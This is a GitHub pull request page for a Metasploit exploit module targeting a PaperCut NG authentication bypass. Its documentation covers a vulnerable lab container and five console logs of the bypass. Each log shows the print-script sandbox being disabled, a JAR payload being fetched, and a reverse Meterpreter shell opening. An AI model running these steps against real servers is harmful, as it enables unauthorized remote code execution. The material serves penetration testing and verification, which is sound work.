Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

PaperCutNG Authentication Bypass with RCE #17936

Merged
merged 40 commits into from Jun 7, 2023
Merged

PaperCutNG Authentication Bypass with RCE #17936

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
40 commits
Select commit Hold shift + click to select a range
253f4e5
rough pseudo-coding
catatonicprime Apr 21, 2023
2010993
Command injection PoC working.
catatonicprime Apr 23, 2023
1a823b0
Serve jar file for exploit.
catatonicprime Apr 25, 2023
17271f1
Adding documentation, expanding failure cases. Always struggle in the…
catatonicprime Apr 25, 2023
a229a0e
If you are receiving 200, that is hard-evidence of bypass. Also Fix t…
catatonicprime Apr 25, 2023
8a9871f
Default to a java payload.
catatonicprime Apr 25, 2023
22238a0
Adding references.
catatonicprime Apr 26, 2023
8c87660
Explicit stance.
catatonicprime Apr 26, 2023
bcafd22
Better defaults pattern for TARGETURI.
catatonicprime Apr 26, 2023
0cf5f4c
More accurate list of side effects.
catatonicprime Apr 26, 2023
8694bee
Removing unnecessary search.
catatonicprime Apr 26, 2023
9f6fe96
bypass_auth returns the anti-csrf token and vprints active session on…
catatonicprime Apr 26, 2023
5e93669
Enable AutoCheck
catatonicprime Apr 26, 2023
0be38eb
method should do one thing and do it well
catatonicprime Apr 26, 2023
feec15a
full_uri has what we need for the origin header
catatonicprime Apr 27, 2023
16ae6b7
Use the generated payload as is.
catatonicprime Apr 27, 2023
12f7134
generating payloads on the fly is what we wanted originally
catatonicprime Apr 27, 2023
c0be991
removing superfluous options
catatonicprime Apr 28, 2023
4ba8d62
Removing unused documentation
catatonicprime Apr 28, 2023
97a76e3
linting changes. removing unnecessary success checks.
catatonicprime Apr 28, 2023
5f12f0e
Apply suggestions from code review
catatonicprime May 5, 2023
f276487
Adding original ZDI reference. Minor formatting changes.
catatonicprime May 5, 2023
e37e506
heh, I probably should have tested this
catatonicprime May 6, 2023
af3c482
heh, I probably should have tested that too
catatonicprime May 6, 2023
0448d40
Match wording from "How to write a module using HttpServer and HttpCl…
catatonicprime May 6, 2023
c69ca39
consistent indenting
catatonicprime May 6, 2023
43564b5
Removing unneeded features/options.
catatonicprime May 9, 2023
eff189f
Ensuring csrf_token is initialized.
catatonicprime May 9, 2023
c5b0bc6
Improved automatic targeting, tested back to major version 14
catatonicprime May 9, 2023
cb2c6a7
Prevent bypass_auth from being called twice when AutoCheck is true
catatonicprime May 11, 2023
d50bd24
Adding config cleanup.
catatonicprime May 11, 2023
c43eaf8
Adding documentation.
catatonicprime May 11, 2023
a445b07
removing unnecessary call to payload_uri
catatonicprime May 11, 2023
cbf850b
Apparently the comment after the rescue squelchs the linter.
catatonicprime May 30, 2023
b376dac
okay linter
catatonicprime May 30, 2023
530ed91
Fixing ZDI ID
catatonicprime May 30, 2023
6ad9ebb
Update modules/exploits/multi/http/papercut_ng_auth_bypass.rb
catatonicprime May 31, 2023
6351c66
Update modules/exploits/multi/http/papercut_ng_auth_bypass.rb
catatonicprime May 31, 2023
3875947
Removing unnecessary assignment
catatonicprime May 31, 2023
a03603d
Documentation linting.
catatonicprime Jun 6, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
219 changes: 219 additions & 0 deletions documentation/modules/exploit/multi/http/papercut_ng_auth_bypass.md
View file
Open in desktop
@@ -0,0 +1,219 @@
## Vulnerable Application
### Description
PaperCut NG Authentication Bypass affecting the below versions, see
[confirmation](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps):
- version 8.0.0 to 19.2.7 (inclusive)
- version 20.0.0 to 20.1.6 (inclusive)
- version 21.0.0 to 21.2.10 (inclusive)
- version 22.0.0 to 22.0.8 (inclusive)

See module `info` for additional references.

### Building a Vulnerable Container
Papercut NG can be run in a container. This is useful for creating test environments for verification. To acquire past versions of the
software, i.e. known vulnerable versions, see [Download past/old PaperCut NG Versions](https://www.papercut.com/kb/Main/PastVersions).

Versions 16 and later include a "--non-interactive" switch, easing installation. Below I use podman on Centos 9 Stream to containerize the
application for testing.

From an empty directory, create a Dockerfile containing the following:
```dockerfile
FROM almalinux
RUN yum install -y procps-ng net-tools cpio sudo perl which
RUN yum install -y initscripts
RUN useradd -ms /bin/bash papercut
RUN usermod -a -G wheel papercut
RUN echo "papercut ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

COPY pcng-setup-*.sh /

USER papercut
WORKDIR /home/papercut
```

Download a vulnerable version. Build a container. Run the container while performing the installation.
```sh
curl -OJ "https://cdn.papercut.com/files/pcng/16.x/pcng-setup-16.4.39159-linux-x64.sh"
podman build . --tag papercut-16.4.39159
podman run -it --rm -p 9191:9191 localhost/papercut-16.4.39159 /bin/bash -c "sh /*.sh --non-interactive; read"
```
Note: *Be sure to cross reference the target version with the known vulnerable versions, as some of the links in the listed Past Versions
are patched.*

A URL will be provided in the console to access the application, but you will likely need to use an IP accessible from your metasploit
host, e.g. [127.0.0.1](http://127.0.0.1:9191/admin) in order to complete the application setup. After setup, you may commit changes to the
container & tag the new image to maintain your configuration changes. In the future the service can be restarted using
`/etc/init.d/papercut start` from within the container.

*Caveat: When first starting the server or after completing the installation, at least one user needs to login. I think this has something
to do with getting the license manager into the correct state (i.e. loading the license). When this is not yet done then the Authentication
Bypass is still functional leading to a "Target Vulnerable" message during `check`. However, when attempting to select the
"\[Template Printer\]" a redirect to the About page occurs instead. Ensuring a logon can be done by using the "Login" button presented on
the SetupCompleted page used for the bypass. This scenario is not covered in the module as it is unlikely to be an issue on any network
that is currently in use.*


## Verification Steps

1. `./msfconsole -q`
2. `use multi/http/papercut_ng_auth_bypass`
3. `set RHOSTS [target]`
4. `run`

## Scenarios

### Tested on Linux x64 with PaperCut NG Version 22.0.8.65201
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=node0cwd0h7aut351pzjcifwvdyg25.node0
[+] The target is vulnerable.
[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
[*] Using URL: http://10.0.4.101:8080/rYrjrI0
[*] Server started.
[*] Sending payload for requested uri: /rYrjrI0.jar
[*] Sending payload for requested uri: /rYrjrI0.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:46224) at 2023-05-11 01:13:29 +0000
[*] Server stopped.
[*] rolling back 'print.script.sandboxed' to 'Y'
[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
[*] rolling back 'print-and-device.script.enabled' to 'N'
[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'

meterpreter >
```
Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.


### Tested on Linux x64 with PaperCut NG Version 19.2.7.62200
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=node01j4of6hup0i131vs585edo0uqb2.node0
[+] The target is vulnerable.
[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
[*] Using URL: http://10.0.4.101:8080/PWMM7S32xpRY7
[*] Server started.
[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:35072) at 2023-05-11 01:25:25 +0000
[*] Server stopped.
[*] Rolling back 'print.script.sandboxed' to 'Y'
[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
[*] Rolling back 'print-and-device.script.enabled' to 'N'
[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'

meterpreter >
```
Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.


### Tested on Linux x64 with PaperCut NG Version 18.3.9.49588d
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=node0re9f1cbww5v11qgrc7y4g9qv3.node0
[+] The target is vulnerable.
[*] Using URL: http://10.0.4.101:8080/o30YxAzAA69ISJ8
[*] Server started.
[*] Sending payload for requested uri: /o30YxAzAA69ISJ8.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:40328) at 2023-05-11 02:29:15 +0000
[*] Server stopped.

meterpreter >
```

### Tested on Linux x64 with PaperCut NG Version 16.4.39159
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=e79i55m6n77ex4p6ee3fu8u9
[+] The target is vulnerable.
[*] Using URL: http://10.0.4.101:8080/GuHN8K
[*] Server started.
[*] Sending payload for requested uri: /GuHN8K.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:58324) at 2023-05-11 03:22:13 +0000
[*] Server stopped.

meterpreter >
```
Note: The 'Form0' parameter for version 16 and lower does not take an additional '$Submit$1' value.

### Tested on Linux x64 with PaperCut NG Version 14.3.30457
```
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
RHOSTS => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
LHOST => 10.0.4.101
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run

[-] Handler failed to bind to 10.0.4.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Bypass successful and created session: JSESSIONID=b9g3gepapev0
[+] The target is vulnerable.
[*] Using URL: http://10.0.4.101:8080/kBXJNp
[*] Server started.
[*] Sending payload for requested uri: /kBXJNp.jar
[*] Sending stage (58851 bytes) to 10.0.2.100
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:32852) at 2023-05-11 03:56:24 +0000
[*] Server stopped.

meterpreter >
```
Note: Version 14, and possibly earlier, use a different HTML element to report the active version when exercising the vulnerable
'SetupCompleted' page.